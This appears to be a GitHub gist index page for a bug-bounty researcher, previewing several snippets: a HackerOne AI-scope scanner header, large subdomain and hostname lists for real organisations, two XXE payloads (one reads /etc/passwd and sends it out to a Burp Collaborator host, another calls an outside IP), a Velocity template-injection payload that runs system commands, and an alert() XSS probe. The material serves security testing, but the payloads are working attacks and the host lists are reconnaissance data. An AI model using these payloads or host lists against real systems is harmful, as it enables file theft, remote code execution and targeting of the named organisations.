Ben Sadeghipour nahamsec
nahamsec
/ bb_ai_changelog_scraper.py
Last active
March 16, 2026 19:16
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| HackerOne AI/LLM Timeline Scanner | |
| =================================== | |
| Uses the official HackerOne Hacker API to find when public bug bounty programs | |
| added AI / Chatbot / LLM to their scope. Produces a month-by-month trend. | |
| Created by @NahamSec using Claude AI | |
| Youtube.com/NahamSec |
nahamsec
/ gist:a0d01d9f6b89b32a68e7b26c74be691d
Created
September 9, 2024 03:54
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0-asic-qp-cr006rq-dangweb2242.event.flexport.com | |
| 0-assets.event.flexport.com | |
| 0-members.agu.org.unicat.nyeesurgnet.com | |
| 0-webofknowledge.com.emu.nyee2020.com | |
| 0.100.93.177.sent-via.netsuite.com.ttrus.com | |
| 0.hotels.com | |
| 0000.snch.org | |
| 00000eagle.c21.com | |
| 0000confidentialstreet.c21.com | |
| 0000cr637.c21.com |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % xxePOC SYSTEM "file:///etc/passwd"> | |
| <!ENTITY % exfildata "<!ENTITY % exfil SYSTEM 'http://7u2bvf9vu78d9wepre2c3qmg87e82x.burpcollaborator.net/?x=%xxePOC;'>"> | |
| %exfildata; | |
| %exfil; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % d SYSTEM "https://138.68.23.180:443"> | |
| <!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://138.68.23.180:443/%d;'>"> |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| www,719407 | |
| api,69552 | |
| eks,67581 | |
| svc,67131 | |
| cloudapp,65945 | |
| vpn,55659 | |
| bastion,53840 | |
| ax,40676 | |
| dev,38756 | |
| operations,35663 |
nahamsec
/ extracted-subdomains
Created
June 25, 2020 18:51
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| prestigegiftware | |
| 12boxing | |
| 7clouds | |
| alfredhealth | |
| mywell | |
| phdrastreador | |
| halorei | |
| qa2static | |
| hemoservice | |
| astellaspharma |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #set ($e="exp") | |
| #set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd)) | |
| #set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a)) | |
| #set($sc = $e.getClass().forName("java.util.Scanner")) | |
| #set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream"))) | |
| #set($scan=$constructor.newInstance($input).useDelimiter("\\A")) | |
| #if($scan.hasNext()) | |
| $scan.next() | |
| #end |
nahamsec
/ gist:143f4dcdc9ca4ef835c17b164939eef0
Created
January 10, 2018 21:29
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| alert();// |